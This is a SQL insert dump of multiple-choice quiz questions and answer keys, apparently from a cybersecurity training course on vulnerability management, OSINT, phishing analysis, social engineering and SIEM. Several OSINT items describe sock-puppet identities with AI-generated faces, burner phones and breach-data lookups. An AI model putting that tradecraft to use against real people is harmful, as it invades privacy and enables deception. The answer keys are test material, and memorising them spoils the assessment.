(5757, 160, 'Why is \"Verification\" critical after patching?', 2, 'To ensure the patch actually fixed the issue', 0, 'Trust but verify', '2025-12-26 22:11:01', '[\"It increases billable hours\", \"To ensure the patch actually fixed the issue\", \"To verify the server is fast\", \"It is not critical\"]'),
(5758, 160, 'What term describes unknown/unmanaged systems on a network?', 3, 'Shadow IT', 0, 'Hidden', '2025-12-26 22:11:01', '[\"Dark Web\", \"Shadow IT\", \"Hidden Services\", \"Honeypots\"]'),
(5759, 160, 'Which scan type allows the scanner to log into the target?', 4, 'Authenticated Scan', 0, 'Credentialed', '2025-12-26 22:11:01', '[\"Unauthenticated Scan\", \"Stealth Scan\", \"Authenticated Scan\", \"Passive Scan\"]'),
(5760, 160, 'Which scan is better for an accurate inventory of installed software?', 5, 'Authenticated Scan', 0, 'Registry access', '2025-12-26 22:11:01', '[\"Unauthenticated Scan\", \"Port Scan\", \"Authenticated Scan\", \"Ping Sweep\"]');
INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(5761, 160, 'What is the main drawback of relying on \"Banner Grabbing\"?', 6, 'Banners can be fake or suppressed', 0, 'Accuracy', '2025-12-26 22:11:01', '[\"It is illegal\", \"Banners can be fake or suppressed\", \"It crashes servers\", \"It takes too long\"]'),
(5762, 160, 'In CVSS, what does \"AV:N\" indicate?', 7, 'Attack Vector: Network', 0, 'Remote', '2025-12-26 22:11:01', '[\"Attack Vector: None\", \"Attack Vector: Network\", \"Anti-Virus: None\", \"Available: No\"]'),
(5763, 160, 'Which CVSS metric measures if the attacker needs someone to click a link?', 8, 'User Interaction (UI)', 0, 'Interaction', '2025-12-26 22:11:01', '[\"Privileges Required (PR)\", \"Attack Complexity (AC)\", \"User Interaction (UI)\", \"Scope (S)\"]'),
(5764, 160, 'A \"Scope Change\" (S:C) in CVSS means expecting what?', 9, 'Impact extending beyond the vulnerable component', 0, 'VM Escape', '2025-12-26 22:11:01', '[\"Impact extending beyond the vulnerable component\", \"Scope is confidential\", \"System crash\", \"No impact\"]'),
(5765, 160, 'Where should you place a scanner to avoid firewall interference?', 10, 'In the same network segment/zone as the target', 0, 'Local', '2025-12-26 22:11:01', '[\"On the internet\", \"In the same network segment/zone as the target\", \"In the DMZ only\", \"On a distinct VLAN\"]'),
(5766, 160, 'Which scan policy determines if a host is simply alive?', 11, 'Host Discovery', 0, 'Ping', '2025-12-26 22:11:01', '[\"Basic Network Scan\", \"Host Discovery\", \"Malware Scan\", \"Web App Scan\"]'),
(5767, 160, 'Why do we avoid aggressive scans on SCADA/ICS systems?', 12, 'They are fragile and may crash', 0, 'Availability', '2025-12-26 22:11:01', '[\"They are secure by default\", \"They are fragile and may crash\", \"They are mostly air-gapped\", \"Nessus cannot see them\"]'),
(5768, 160, 'What is the most important attribute when prioritizing patches?', 13, 'Exploitability (Is there a script?)', 0, 'Risk', '2025-12-26 22:11:01', '[\"CVSS Score only\", \"Alphabetical Order\", \"Exploitability (Is there a script?)\", \"Vendor Name\"]'),
(5769, 160, 'What does Tenable VPR add to the analysis?', 14, 'Real-time threat context', 0, 'Prediction', '2025-12-26 22:11:01', '[\"Nothing\", \"Real-time threat context\", \"Color coding\", \"PDF export\"]'),
(5770, 160, 'What is an \"Emergency\" patch typically reserved for?', 15, 'Zero-Day exploits', 0, 'Log4j scenario', '2025-12-26 22:11:01', '[\"Routine updates\", \"Feature releases\", \"Zero-Day exploits\", \"UI fixes\"]'),
(5771, 160, 'Why must you have a \"Rollback Plan\" before patching?', 16, 'To recover if the patch breaks the server', 0, 'Safety', '2025-12-26 22:11:01', '[\"To uninstall viruses\", \"To recover if the patch breaks the server\", \"Compliance requires it\", \"It is optional\"]'),
(5772, 160, 'Who maintains the official CVE list?', 17, 'MITRE', 0, 'The list owner', '2025-12-26 22:11:01', '[\"NIST\", \"MITRE\", \"Microsoft\", \"Google\"]'),
(5773, 160, 'What is the difference between CVE and CWE?', 18, 'CVE is the specific flaw, CWE is the category', 0, 'Instance vs Type', '2025-12-26 22:11:01', '[\"They are identical\", \"CVE is for software, CWE for hardware\", \"CVE is the specific flaw, CWE is the category\", \"CWE is the score\"]'),
(5774, 160, 'If you cannot patch a system, but isolate it with a firewall, this is called?', 19, 'Remediation (Mitigation)', 0, 'Compensating Control', '2025-12-26 22:11:01', '[\"Acceptance\", \"Remediation (Mitigation)\", \"Transference\", \"Avoidance\"]'),
(5775, 160, 'Buying Cyber Insurance is an example of which risk strategy?', 20, 'Transference', 0, 'Shifting costs', '2025-12-26 22:11:01', '[\"Avoidance\", \"Acceptance\", \"Transference\", \"Mitigation\"]'),
(5776, 181, 'What is the defining characteristic of OSINT?', 1, 'It uses publicly available information', 0, 'Public', '2025-12-26 22:15:15', '[\"It uses hacking tools\", \"It uses spy satellites\", \"It uses publicly available information\", \"It is always illegal\"]'),
(5777, 181, 'Is browsing a company\'s public website considered \"Hacking\"?', 2, 'No, it is Passive OSINT', 0, 'Passive', '2025-12-26 22:15:15', '[\"Yes, immediately\", \"No, it is Passive OSINT\", \"Only if you use Chrome\", \"Only if using VPN\"]'),
(5778, 181, 'Which method gives you information without alerting the target?', 3, 'Passive Reconnaissance', 0, 'Quiet', '2025-12-26 22:15:15', '[\"Active Scanning\", \"Passive Reconnaissance\", \"Phishing\", \"DDoS\"]'),
(5779, 182, 'What is the first step of the Intelligence Cycle?', 1, 'Planning & Direction', 0, 'Goal setting', '2025-12-26 22:15:15', '[\"Collection\", \"Planning & Direction\", \"Analysis\", \"Hacking\"]'),
(5780, 182, 'In which phase do you \"connect the dots\" to form a conclusion?', 2, 'Analysis', 0, 'Thinking', '2025-12-26 22:15:15', '[\"Collection\", \"Analysis\", \"Processing\", \"Scanning\"]'),
(5781, 182, 'What is the output of the \"Collection\" phase?', 3, 'Raw Data', 0, 'Unsorted stuff', '2025-12-26 22:15:15', '[\"Finished Report\", \"Raw Data\", \"Intelligence\", \"Arrests\"]'),
(5782, 183, 'What is a \"Sock Puppet\" in OSINT?', 1, 'A fake online identity', 0, 'Disguise', '2025-12-26 22:15:15', '[\"A hand puppet\", \"A fake online identity\", \"A hacking tool\", \"A VPN protocol\"]'),
(5783, 183, 'Why should you verify your VPN before starting?', 2, 'To hide your Source IP from the target', 0, 'Anonymity', '2025-12-26 22:15:15', '[\"To make internet faster\", \"To hide your Source IP from the target\", \"To access Netflix\", \"To save battery\"]'),
(5784, 183, 'Why use an AI-generated face for a fake profile?', 3, 'Avoids Reverse Image Search detection', 0, 'Uniqueness', '2025-12-26 22:15:15', '[\"It looks better\", \"Avoids Reverse Image Search detection\", \"Real photos are illegal\", \"It is faster\"]'),
(5785, 184, 'Which operator restricts results to a specific website?', 1, 'site:', 0, 'Domain limit', '2025-12-26 22:15:16', '[\"host:\", \"site:\", \"www:\", \"map:\"]'),
(5786, 184, 'How do you find specifically PDF files?', 2, 'filetype:pdf', 0, 'File extension', '2025-12-26 22:15:16', '[\"pdf:\", \"filetype:pdf\", \"ext:adobe\", \"doc:pdf\"]'),
(5787, 184, 'What does `intitle:\"index of\"` typically reveal?', 3, 'Open Directory Listings', 0, 'A list of files', '2025-12-26 22:15:16', '[\"The homepage\", \"Open Directory Listings\", \"Google Maps\", \"DNS records\"]'),
(5788, 185, 'What concept relies on users choosing the same handle everywhere?', 1, 'Username Correlation', 0, 'Reuse', '2025-12-26 22:15:16', '[\"Password Reuse\", \"Username Correlation\", \"Identity Theft\", \"Phishing\"]'),
(5789, 185, 'Which tool checks a username across hundreds of sites?', 2, 'Sherlock', 0, 'Detective', '2025-12-26 22:15:16', '[\"Nmap\", \"Sherlock\", \"Wireshark\", \"Metasploit\"]'),
(5790, 185, 'If a user deletes a post, where might you still find it?', 3, 'Wayback Machine / Archive', 0, 'Time travel', '2025-12-26 22:15:16', '[\"Recycle Bin\", \"Wayback Machine / Archive\", \"Dark Web\", \"Nowhere\"]'),
(5791, 186, 'What does \"HaveIBeenPwned\" tell you?', 1, 'If an email was part of a known breach', 0, 'Leak status', '2025-12-26 22:15:16', '[\"The user\'s password\", \"If an email was part of a known breach\", \"The user\'s location\", \"The user\'s bank\"]'),
(5792, 186, 'What is Hunter.io primarily used for?', 2, 'Finding corporate email formats', 0, 'Business emails', '2025-12-26 22:15:16', '[\"Hacking wifi\", \"Finding corporate email formats\", \"Tracing phones\", \"Buying guns\"]'),
(5793, 186, 'Why is old breach data useful?', 3, 'Password reuse', 0, 'Habits', '2025-12-26 22:15:16', '[\"It isn\'t\", \"Password reuse\", \" blackmail\", \"It proves they are dumb\"]'),
(5794, 187, 'What hidden data in a photo might reveal location?', 1, 'EXIF / GPS Data', 0, 'Metadata', '2025-12-26 22:15:16', '[\"Pixels\", \"EXIF / GPS Data\", \"Color profile\", \"File name\"]'),
(5795, 187, 'Which search engine is famous for its facial recognition capabilities?', 2, 'Yandex', 0, 'Russian one', '2025-12-26 22:15:16', '[\"Bing\", \"DuckDuckGo\", \"Yandex\", \"Yahoo\"]'),
(5796, 187, 'What does Reverse Image Search help you find?', 3, 'Where else the image appears online', 0, 'Sources', '2025-12-26 22:15:16', '[\"The person\'s name\", \"Where else the image appears online\", \"The camera model\", \"The password\"]'),
(5797, 188, 'What record functions as the \"birth certificate\" of a domain?', 1, 'WHOIS', 0, 'Registration', '2025-12-26 22:15:16', '[\"DNS\", \"WHOIS\", \"SSL\", \"HTTP\"]'),
(5798, 188, 'Why do we look for subdomains like \"dev.example.com\"?', 2, 'Often less secure / testing environments', 0, 'Weak targets', '2025-12-26 22:15:16', '[\"They look cool\", \"Often less secure / testing environments\", \"They represent the CEO\", \"They are faster\"]'),
(5799, 188, 'What does \"BuiltWith\" tell you?', 3, 'The technology stack used', 0, 'Tech', '2025-12-26 22:15:16', '[\"Who owns it\", \"The technology stack used\", \"The password\", \"The bugs\"]'),
(5800, 189, 'What tool maps Wifi SSIDs to GPS coordinates?', 1, 'Wigle.net', 0, 'Wifi map', '2025-12-26 22:15:16', '[\"Google Maps\", \"Wigle.net\", \"Shodan\", \"WifiCracker\"]'),
(5801, 189, 'What feature of Google Earth helps verify \"When\" a satellite image was taken?', 2, 'Historical Imagery', 0, 'Timeline', '2025-12-26 22:15:16', '[\"Street View\", \"Historical Imagery\", \"3D Buildings\", \"Atmosphere\"]'),
(5802, 189, 'How can SunCalc help in IMINT?', 3, 'Determine time of day from shadows', 0, 'Shadows', '2025-12-26 22:15:16', '[\"Find the weather\", \"Determine time of day from shadows\", \"Find solar panels\", \"Navigate\"]'),
(5803, 190, 'What does OSINT stand for?', 1, 'Open Source Intelligence', 0, 'Open Source', '2025-12-26 22:15:16', '[\"Open Source Intelligence\", \"Overseas Intelligence\", \"Online Security INTerface\", \"Open System Integration\"]'),
(5804, 190, 'Is Passive OSINT illegal?', 2, 'Generally No (accessing public data)', 0, 'No', '2025-12-26 22:15:16', '[\"Yes, always\", \"Generally No (accessing public data)\", \"Only in Europe\", \"Only for police\"]'),
(5805, 190, 'What is the best way to protect your identity during research?', 3, 'Use a Sock Puppet and VPN', 0, 'OPSEC', '2025-12-26 22:15:16', '[\"Clear cookies\", \"Use a Sock Puppet and VPN\", \"Use Incognito Mode\", \"Ask permission\"]'),
(5806, 190, 'Which Google Dork finds Excel files?', 4, 'filetype:xlsx', 0, 'Spreadsheet', '2025-12-26 22:15:16', '[\"file:excel\", \"filetype:xlsx\", \"type:xls\", \"ext:sheet\"]'),
(5807, 190, 'Which operator searches for text inside the URL?', 5, 'inurl:', 0, 'URL text', '2025-12-26 22:15:16', '[\"site:\", \"inurl:\", \"link:\", \"addr:\"]'),
(5808, 190, 'If you want to view a deleted page, what Google operator helps?', 6, 'cache:', 0, 'Snapshot', '2025-12-26 22:15:16', '[\"history:\", \"cache:\", \"old:\", \"back:\"]'),
(5809, 190, 'Which tool is best for checking username reuse across 300+ sites?', 7, 'Sherlock', 0, 'Python script', '2025-12-26 22:15:16', '[\"Nessus\", \"Sherlock\", \"John the Ripper\", \"Wireshark\"]'),
(5810, 190, 'What service helps you find the email format for a company (e.g., first.last)?', 8, 'Hunter.io', 0, 'Email patterns', '2025-12-26 22:15:16', '[\"HaveIBeenPwned\", \"Hunter.io\", \"Gmail\", \"Outlook\"]'),
(5811, 190, 'What does \"HaveIBeenPwned\" check?', 9, 'If an email is in a known data breach', 0, 'Breaches', '2025-12-26 22:15:16', '[\"The email password\", \"If an email is in a known data breach\", \"If the email is valid\", \"Who owns the email\"]'),
(5812, 190, 'Which search engine is preferred for facial recognition checks?', 10, 'Yandex', 0, 'Russian AI', '2025-12-26 22:15:16', '[\"Bing\", \"Google\", \"Yandex\", \"DuckDuckGo\"]'),
(5813, 190, 'What metadata in a photo provides GPS coordinates?', 11, 'EXIF', 0, 'Tags', '2025-12-26 22:15:16', '[\"Pixel\", \"EXIF\", \"PNG\", \"Stenography\"]'),
(5814, 190, 'What tool lets you search for Wifi hotspots by SSID?', 12, 'Wigle.net', 0, 'War driving DB', '2025-12-26 22:15:16', '[\"WifiMap\", \"Wigle.net\", \"Google Wifi\", \"NetStumbler\"]'),
(5815, 190, 'What record tells you who owns a domain name?', 13, 'WHOIS', 0, 'Registry', '2025-12-26 22:15:16', '[\"DNS\", \"WHOIS\", \"ARP\", \"DHCP\"]'),
(5816, 190, 'What tool visualizes domain infrastructure and subdomains as a graph?', 14, 'DNSDumpster', 0, 'Graph', '2025-12-26 22:15:16', '[\"Nmap\", \"DNSDumpster\", \"Ping\", \"Traceroute\"]'),
(5817, 190, 'Why are subdomains like \"dev\" or \"staging\" valuable targets?', 15, 'Often have weaker security/config', 0, 'Forgotten', '2025-12-26 22:15:16', '[\"They are faster\", \"Often have weaker security/config\", \"They are public\", \"They have more money\"]'),
(5818, 190, 'What is the \"Intelligence Cycle\" step where you interpret data?', 16, 'Analysis', 0, 'Reasoning', '2025-12-26 22:15:16', '[\"Collection\", \"Analysis\", \"Planning\", \"Filing\"]'),
(5819, 190, 'What is a \"Grey Hat\" OSINT source?', 17, 'Semi-legal/paid breach data sites', 0, 'DeHashed', '2025-12-26 22:15:16', '[\"Government sites\", \"Semi-legal/paid breach data sites\", \"News sites\", \"Libraries\"]'),
(5820, 190, 'Why should you verify \"Sock Puppets\" with a burner phone?', 18, 'Platforms require SMS verification', 0, '2FA', '2025-12-26 22:15:16', '[\"To call the target\", \"Platforms require SMS verification\", \"To look cool\", \"It is cheaper\"]'),
(5821, 190, 'What is \"Google Hacking\"?', 19, 'Using advanced operators to find sensitive info', 0, 'Dorking', '2025-12-26 22:15:16', '[\"Hacking Google servers\", \"Using advanced operators to find sensitive info\", \"Phishing Google employees\", \"Using Chrome\"]'),
(5822, 190, 'What is the primary risk of \"Active\" recon (like port scanning)?', 20, 'It generates logs/alerts on the target', 0, 'Detection', '2025-12-26 22:15:16', '[\"It is slow\", \"It generates logs/alerts on the target\", \"It costs money\", \"Nothing\"]'),
(5823, 191, 'Which header field usually matches the actual Envelope Sender?', 1, 'Return-Path', 0, 'Return', '2025-12-26 22:17:47', '[\"Reply-To\", \"Return-Path\", \"From\", \"Subject\"]'),
(5824, 191, 'If \"From\" is \"ceo@company.com\" but \"Return-Path\" is \"hacker@gmail.com\", what is this called?', 2, 'Spoofing', 0, 'Mismatch', '2025-12-26 22:17:47', '[\"Phishing\", \"Spoofing\", \"Spam\", \"Relaying\"]'),
(5825, 191, 'Are \"Message Headers\" authenticated by default?', 3, 'No, they can be easily faked', 0, 'No', '2025-12-26 22:17:47', '[\"Yes, strictly\", \"No, they can be easily faked\", \"Only on Gmail\", \"Only on Outlook\"]'),
(5826, 192, 'Which protocol uses a DNS list of allowed Sender IPs?', 1, 'SPF', 0, 'Sender Policy', '2025-12-26 22:17:47', '[\"SPF\", \"DKIM\", \"DMARC\", \"POP3\"]'),
(5827, 192, 'What does DKIM prevent?', 2, 'Tampering / Modification', 0, 'Integrity', '2025-12-26 22:17:47', '[\"Spoofing IP\", \"Tampering / Modification\", \"Spam\", \"Viruses\"]'),
(5828, 192, 'If DMARC policy is \"p=reject\", what happens to spoofed emails?', 3, 'They are blocked/deleted', 0, 'Reject', '2025-12-26 22:17:47', '[\"Delivered to Inbox\", \"Sent to Spam\", \"They are blocked/deleted\", \"Returned to sender\"]'),
(5829, 193, 'What is \"Typosquatting\"?', 1, 'Registering a domain that looks like the real one', 0, 'Misspelling', '2025-12-26 22:17:47', '[\"Hacking DNS\", \"Registering a domain that looks like the real one\", \"Stealing passwords\", \"Deleting data\"]'),
(5830, 193, 'The \"From\" header says \"tesla-corp.io\". Why is this suspicious?', 2, 'It is not the official trusted domain', 0, 'Fake domain', '2025-12-26 22:17:47', '[\"It is too long\", \"It is not the official trusted domain\", \"It uses hyphens\", \"It is fine\"]'),
(5831, 193, 'What psychological trigger is used in \"URGENT WIRE TRANSFER\"?', 3, 'Urgency / Panic', 0, 'Fear', '2025-12-26 22:17:47', '[\"Greed\", \"Urgency / Panic\", \"Curiosity\", \"Authority\"]'),
(5832, 194, 'Why is \"file.pdf.exe\" dangerous?', 1, 'Windows hides the .exe extension', 0, 'Double extension', '2025-12-26 22:17:47', '[\"It is a PDF\", \"Windows hides the .exe extension\", \"It is corrupt\", \"It is encrypted\"]'),
(5833, 194, 'What is the first safe step when you have a suspicious file?', 2, 'Hash it and check VirusTotal', 0, 'Hashing', '2025-12-26 22:17:47', '[\"Open it\", \"Hash it and check VirusTotal\", \"Email it to IT\", \"Rename it\"]'),
(5834, 194, 'What does \"X-PHP-Originating-Script\" usually indicate?', 3, 'Sent via a web script/bot', 0, 'Automated', '2025-12-26 22:17:47', '[\"Sent by Outlook\", \"Sent via a web script/bot\", \"Sent by Gmail\", \"Legitimate marketing\"]'),
(5835, 195, 'What does \"Defanging\" a URL mean?', 1, 'Making it unclickable', 0, 'Safety', '2025-12-26 22:17:47', '[\"Deleting it\", \"Making it unclickable\", \"Encrypting it\", \"Clicking it\"]'),
(5836, 195, 'If SPF fails for \"microsoft.com\", what does it mean?', 2, 'The sender IP is not Microsoft', 0, 'Spoofing', '2025-12-26 22:17:47', '[\"Microsoft is down\", \"The sender IP is not Microsoft\", \"The email is legitimate\", \"DNS is broken\"]'),
(5837, 195, 'What is suspicious about \"login.microsoft.com.xyz\"?', 3, 'The TLD is .xyz, not .com', 0, 'Fake domain', '2025-12-26 22:17:47', '[\"It is too short\", \"The TLD is .xyz, not .com\", \"It contains login\", \"It is secure\"]'),
(5838, 196, 'What is the TRUE sender address (Return-Path)?', 1, 'support-ticket-882@gmail.com', 0, 'Return Path', '2025-12-26 22:17:47', '[\"admin@company.com\", \"support-ticket-882@gmail.com\", \"victim@company.com\", \"mail.attacker-infrastructure.net\"]'),
(5839, 196, 'Who does the email CLAIM to be from (Display Name)?', 2, 'IT Service Desk', 0, 'Fake Name', '2025-12-26 22:17:47', '[\"Support Ticket\", \"IT Service Desk\", \"Gmail Team\", \"HR\"]'),
(5840, 196, 'Look at the X-Mailer. What software sent this?', 3, 'OstroMail v1.2 (Mass Mailer)', 0, 'Mass Mailer', '2025-12-26 22:17:47', '[\"Outlook\", \"Gmail\", \"OstroMail v1.2 (Mass Mailer)\", \"iPhone Mail\"]'),
(5841, 196, 'Did SPF pass or fail?', 4, 'Pass', 0, 'Pass', '2025-12-26 22:17:47', '[\"Fail\", \"SoftFail\", \"Pass\", \"Neutral\"]'),
(5842, 196, 'Why is this suspicious, despite SPF passing?', 5, 'Sender authenticated as Gmail, but spoofed Company header', 0, 'Mismatch', '2025-12-26 22:17:47', '[\"SPF failed\", \"Sender authenticated as Gmail, but spoofed Company header\", \"It came from Microsoft\", \"The date is wrong\"]'),
(5843, 201, 'Which principle relies on the target\'s fear of disobeying a superior?', 1, 'Authority', 0, 'Boss', '2025-12-26 22:28:54', '[\"Reciprocity\", \"Authority\", \"Liking\", \"Consistency\"]'),
(5844, 201, '\"Act now or lose your account!\" exploits which psychological trigger?', 2, 'Urgency / Scarcity', 0, 'Panic', '2025-12-26 22:28:54', '[\"Trust\", \"Urgency / Scarcity\", \"Social Proof\", \"Kindness\"]'),
(5845, 201, 'What is the best immediate defense when you feel \"rushed\" by a request?', 3, 'Stop and Verify', 0, 'Pause', '2025-12-26 22:28:54', '[\"Do it quickly\", \"Stop and Verify\", \"Argue\", \"Ignore it\"]'),
(5846, 202, 'What is \"Pretexting\"?', 1, 'Creating a fake scenario to trick a victim', 0, 'Story', '2025-12-26 22:28:54', '[\"Guessing passwords\", \"Creating a fake scenario to trick a victim\", \"Scanning ports\", \"Coding malware\"]'),
(5847, 202, 'Who is a common persona for attackers to impersonate?', 2, 'IT Support', 0, 'Help Desk', '2025-12-26 22:28:54', '[\"The Janitor\", \"IT Support\", \"A stranger\", \"A dog\"]'),
(5848, 202, 'How do you defeat an impersonator on the phone?', 3, 'Call them back on a verified number', 0, 'Callback', '2025-12-26 22:28:54', '[\"Ask their name\", \"Call them back on a verified number\", \"Yell at them\", \"Tracing the call\"]'),
(5849, 203, 'What is \"Vishing\"?', 1, 'Phishing conducted over the phone', 0, 'Voice', '2025-12-26 22:28:54', '[\"Video Phishing\", \"Phishing conducted over the phone\", \"Virtual Fishing\", \"Virus Phishing\"]'),
(5850, 203, 'Why is Caller ID not a reliable way to verify a caller?', 2, 'It can be easily spoofed', 0, 'Fake numbers', '2025-12-26 22:28:54', '[\"It is encrypted\", \"It can be easily spoofed\", \"It costs money\", \"It is old tech\"]'),
(5851, 203, 'What payment method is a major red flag for scam calls?', 3, 'Gift Cards', 0, 'iTunes', '2025-12-26 22:28:54', '[\"Credit Card\", \"Gift Cards\", \"Wire Transfer\", \"Check\"]'),
(5852, 204, 'What makes Smishing URLs harder to inspect than email URLs?', 1, 'Mobile interfaces make hovering/previewing difficult', 0, 'No mouse', '2025-12-26 22:28:54', '[\"They are encrypted\", \"Mobile interfaces make hovering/previewing difficult\", \"They are faster\", \"They are secure\"]'),
(5853, 204, 'What is a common \"Lure\" for SMS attacks?', 2, 'Missed package delivery', 0, 'USPS', '2025-12-26 22:28:54', '[\"Free pizza\", \"Missed package delivery\", \"Weather alert\", \"News update\"]'),
(5854, 204, 'If you get a suspicious text from your \"Bank\", what should you do?', 3, 'Log in via the official App or Website', 0, 'Direct access', '2025-12-26 22:28:54', '[\"Click the link\", \"Log in via the official App or Website\", \"Reply STOP\", \"Call the number in the text\"]'),
(5855, 205, 'What constitutes \"Tailgating\"?', 1, 'Following someone into a secure area without badging in', 0, 'Piggyback', '2025-12-26 22:28:54', '[\"Driving too close\", \"Following someone into a secure area without badging in\", \"Breaking a lock\", \"Hacking a badge reader\"]'),
(5856, 205, 'How do attackers exploit \"politeness\" to bypass physical security?', 2, 'Holding the door for someone carrying items', 0, 'Heavy box', '2025-12-26 22:28:54', '[\"Buying lunch\", \"Holding the door for someone carrying items\", \"Saying please\", \"Dressing nice\"]'),
(5857, 205, 'What is the primary defense against Dumpster Diving?', 3, 'Shredding sensitive documents', 0, 'Shred', '2025-12-26 22:28:54', '[\"Burning trash\", \"Shredding sensitive documents\", \"Recycling\", \"Hiding trash\"]'),
(5858, 206, 'What is a \"USB Drop\" attack?', 1, 'Leaving an infected USB drive for a victim to find', 0, 'Bait', '2025-12-26 22:28:54', '[\"Throwing USBs at people\", \"Leaving an infected USB drive for a victim to find\", \"Stealing USBs\", \"Buying USBs\"]'),
(5859, 206, 'What human emotion does Baiting primarily exploit?', 2, 'Curiosity', 0, 'Wonder', '2025-12-26 22:28:54', '[\"Fear\", \"Curiosity\", \"Greed\", \"Sadness\"]'),
(5860, 206, 'How does Quid Pro Quo differ from Baiting?', 3, 'It involves an exchange of service/help', 0, 'Exchange', '2025-12-26 22:28:54', '[\"It is faster\", \"It involves an exchange of service/help\", \"It is digital only\", \"It uses email\"]'),
(5861, 207, 'Which Cialdini principle explains why people comply with requests from \"The CEO\"?', 1, 'Authority', 0, 'Boss', '2025-12-26 22:28:54', '[\"Liking\", \"Authority\", \"Scarcity\", \"Reciprocity\"]'),
(5862, 207, 'If an attacker does you a favor to make you feel obligated, which principle is this?', 2, 'Reciprocity', 0, 'Owe me', '2025-12-26 22:28:54', '[\"Social Proof\", \"Reciprocity\", \"Authority\", \"Commitment\"]'),
(5863, 207, '\"Only 2 spots left!\" is an example of:', 3, 'Scarcity', 0, 'Rare', '2025-12-26 22:28:54', '[\"Authority\", \"Scarcity\", \"Consistency\", \"Liking\"]'),
(5864, 207, 'What is the best way to verify a \"Bank\" calling you?', 4, 'Hang up and call the number on your card', 0, 'Source of truth', '2025-12-26 22:28:54', '[\"Ask for their ID\", \"Hang up and call the number on your card\", \"Trust Caller ID\", \"Ask for a supervisor\"]'),
(5865, 207, 'What is \"Pretexting\"?', 5, 'Creating a fabricated scenario to obtain info', 0, 'Lying scenario', '2025-12-26 22:28:54', '[\"Using text messages\", \"Creating a fabricated scenario to obtain info\", \"Pre-authorized scanning\", \"Testing backups\"]'),
(5866, 207, 'Which technology has made Vishing much more dangerous recently?', 6, 'AI Voice Cloning / Deepfakes', 0, 'AI', '2025-12-26 22:28:54', '[\"5G\", \"AI Voice Cloning / Deepfakes\", \"Fiber Optics\", \"VoIP\"]'),
(5867, 207, 'Why are shortened URLs (bit.ly) dangerous in SMS?', 7, 'They hide the true destination', 0, 'Obfuscation', '2025-12-26 22:28:54', '[\"They are slow\", \"They hide the true destination\", \"They cost money\", \"They assume HTTP\"]'),
(5868, 207, 'What is the term for Phishing via SMS?', 8, 'Smishing', 0, 'SMS', '2025-12-26 22:28:54', '[\"Vishing\", \"Smishing\", \"Phishing\", \"Texting\"]'),
(5869, 207, 'Where should you report spam texts?', 9, '7726 (SPAM)', 0, 'Carrier code', '2025-12-26 22:28:54', '[\"911\", \"7726 (SPAM)\", \"The Police\", \"Your Mom\"]'),
(5870, 207, 'What is \"Tailgating\"?', 10, 'Following an authorized person through a secure door', 0, 'Piggybacking', '2025-12-26 22:28:54', '[\"Driving close\", \"Following an authorized person through a secure door\", \"Hacking the lock\", \"Climbing the fence\"]'),
(5871, 207, 'What is the counter-measure for \"Dumpster Diving\"?', 11, 'Shredding documents', 0, 'Destruction', '2025-12-26 22:28:54', '[\"Recycling\", \"Shredding documents\", \"burning\", \"hiding\"]'),
(5872, 207, 'What is \"Shoulder Surfing\"?', 12, 'Looking at someone\'s screen/keyboard to steal info', 0, 'Peeking', '2025-12-26 22:28:54', '[\"Massaging shoulders\", \"Looking at someone\'s screen/keyboard to steal info\", \"Surfing the web\", \"Hacking wifi\"]'),
(5873, 207, 'If you find a USB drive labeled \"Payroll\" in the lobby, what should you do?', 13, 'Do not plug it in; give to Security', 0, 'Quarantine', '2025-12-26 22:28:54', '[\"Plug it in to check\", \"Do not plug it in; give to Security\", \"Throw it away\", \"Keep it\"]'),
(5874, 207, 'Establishing a fake \"Free WiFi\" spot to steal data is called:', 14, 'Evil Twin', 0, 'WiFi Clone', '2025-12-26 22:28:54', '[\"Bad Twin\", \"Evil Twin\", \"Good Twin\", \"Rogue AP\"]'),
(5875, 207, '\"Quid Pro Quo\" means:', 15, 'Something for Something', 0, 'Exchange', '2025-12-26 22:28:54', '[\"Free for all\", \"Something for Something\", \"Nothing for Nothing\", \"Quick Pro\"]'),
(5876, 207, 'What is the weakest link in most security systems?', 16, 'The Human', 0, 'People', '2025-12-26 22:28:54', '[\"The Firewall\", \"The Human\", \"The Encryption\", \"The Password\"]'),
(5877, 207, 'Does Social Engineering always involve a computer?', 17, 'No (Physical/Phone)', 0, 'No', '2025-12-26 22:28:54', '[\"Yes\", \"No (Physical/Phone)\", \"Maybe\", \"Only on Tuesdays\"]'),
(5878, 207, 'What implies \"Social Proof\"?', 18, '\"9 out of 10 users did this\"', 0, 'Crowd', '2025-12-26 22:28:54', '[\"\\\"I am the boss\\\"\", \"\\\"9 out of 10 users did this\\\"\", \"\\\"This is rare\\\"\", \"\\\"I like you\\\"\"]'),
(5879, 207, 'Why do attackers target new employees?', 19, 'They are eager to please and don\'t know procedures', 0, 'Newbies', '2025-12-26 22:28:54', '[\"They have more access\", \"They are eager to please and don\'t know procedures\", \"They make more money\", \"They are dumb\"]'),
(5880, 207, 'What is the best general defense against Social Engineering?', 20, 'Security Awareness Training & skepticism', 0, 'Training', '2025-12-26 22:28:54', '[\"Better Firewalls\", \"Security Awareness Training & skepticism\", \"More Antivirus\", \"Blocking Email\"]'),
(5881, 221, 'What is the primary function of \"Correlation\" in a SIEM?', 1, 'Connecting related events to detect threats', 0, 'Connecting dots', '2025-12-26 22:35:58', '[\"Saving storage space\", \"Connecting related events to detect threats\", \"Deleting old logs\", \"Speeding up the network\"]'),
(5882, 221, 'Why is \"Retention\" important?', 2, 'Compliance and Forensic Investigation', 0, 'History', '2025-12-26 22:35:58', '[\"To fill up hard drives\", \"Compliance and Forensic Investigation\", \"To slow down the system\", \"It is not important\"]'),
(5883, 221, 'What component typically sits on the Endpoint to send logs?', 3, 'Forwarder / Agent', 0, 'Sender', '2025-12-26 22:35:58', '[\"Firewall\", \"Forwarder / Agent\", \"Router\", \"Switch\"]'),
(5884, 222, 'Which protocol is the standard for network device logging?', 1, 'Syslog', 0, 'Standard', '2025-12-26 22:35:58', '[\"SMB\", \"Syslog\", \"FTP\", \"HTTP\"]'),
(5885, 222, 'What is \"NetFlow\" data?', 2, 'Traffic metadata (Who talked to Whom)', 0, 'Traffic info', '2025-12-26 22:35:58', '[\"Full packet capture\", \"Traffic metadata (Who talked to Whom)\", \"Email contents\", \"File contents\"]'),
(5886, 222, 'Why is \"Time Zone\" alignment critical in SIEM?', 3, 'To accurately correlate events across the world', 0, 'Timeline', '2025-12-26 22:35:58', '[\"It isn\'t\", \"To accurately correlate events across the world\", \"To know when to eat lunch\", \"For daylight savings\"]'),
